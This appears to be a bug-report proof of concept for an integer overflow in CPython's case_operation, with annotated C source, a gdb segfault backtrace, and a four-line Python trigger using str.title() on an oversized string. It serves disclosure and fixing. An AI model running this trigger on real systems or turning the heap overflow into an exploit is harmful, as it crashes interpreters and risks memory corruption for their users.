# Objects\unicodeobject.c
# 
# static PyObject *
# case_operation(PyObject *self,
#                Py_ssize_t (*perform)(int, void *, Py_ssize_t, Py_UCS4 *, Py_UCS4 *))
# {
#     PyObject *res = NULL;
#     Py_ssize_t length, newlength = 0;
#     int kind, outkind;
#     (...)
# 1   length = PyUnicode_GET_LENGTH(self);
# 2   tmp = PyMem_MALLOC(sizeof(Py_UCS4) * 3 * length);
#     (...)
# 3   newlength = perform(kind, data, length, tmp, &maxchar);
# 
# 1. there are no safety checks 
# 2. 12*length overflows
# 3. perform() writes to tmp buffer, which is too small to hold the result
# 
# This ends with:
# 
# Program received signal SIGSEGV, Segmentation fault.
# 0x0815168d in do_title (kind=1, data=0x40577038, length=357913942, res=0x96aab88,
#     maxchar=0xbf8283e0) at Objects/unicodeobject.c:9599
# 9599                res[k++] = mapped[j];
# (gdb) bt
# #0  0x0815168d in do_title (kind=1, data=0x40577038, length=357913942, res=0x96aab88,
#     maxchar=0xbf8283e0) at Objects/unicodeobject.c:9599
# #1  0x0815194e in case_operation (
#     self='a...', perform=0x81515b8 <do_title>) at Objects/unicodeobject.c:9625
# #2  0x0815833c in unicode_title (
#     self='a...') at Objects/unicodeobject.c:10517

n=int(2**32/12)
n+=1
s='a'*n
s.title()